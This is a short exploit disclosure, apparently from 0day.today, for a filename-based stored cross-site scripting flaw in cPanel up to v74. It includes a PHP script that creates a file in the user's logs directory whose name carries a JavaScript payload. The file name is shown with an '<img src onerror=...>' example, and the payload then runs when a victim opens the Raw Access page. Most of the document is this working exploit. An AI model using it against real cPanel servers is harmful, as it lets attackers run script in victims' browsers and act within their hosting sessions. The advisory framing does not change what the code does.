cPanel Filename Based Stored XSS < v76 Exploit

[+] Title: cPanel Filename Based Stored XSS <= v74

[+] Author: Numan OZDEMIR

[+] Vendor Homepage: cpanel.com

[+] Version: Up to v74. Will be fixed in v76.

[+] Discovered by Numan OZDEMIR in InfinitumIT Labs

[+] [email protected] - [email protected]

[~] Description:

Attacker can inject JavaScript codes without cPanel privilege. Normally an attacker cant intervene to cPanel without cPanel privilege. But with this vulnerability, attacker can run JavaScript codes on cPanel user's browser while the victim surfing here:
http://ip:2082/cpsessXXXXXXXXXX/frontend/THEME/raw/index.html (Raw Access Page)
 
[~] How to Reproduce:
Create a file as named with your payload in /home/user/logs directory
or run the php exploit:

Note: You cant create a file as named with / (slash) character by this exploit.

This vulnerability is disclosed by cPanel Team's confirmation.

// for secure days...

<center>
<?php
$p = $_POST['payload'];
$x = get_current_user();
$dir = "/home/".$x."/logs/";

if($_POST){
	if(touch($dir.$p)){
	die('
	Successfully exploited. Visit <br>
http://ip:2082/cpsessXXXXXXXXXX/frontend/THEME/raw/index.html	
	');
	}else{
		die('An error occured.');
	}
}else{
echo 'Enter your payload:
<form action="" method="post"><input type="text" name="payload" placeholder="<img src onerror=alert(2)>">
<input type="submit" value=">>"></form>';
}

// end of the script.
?>


#  0day.today [2018-08-16]  #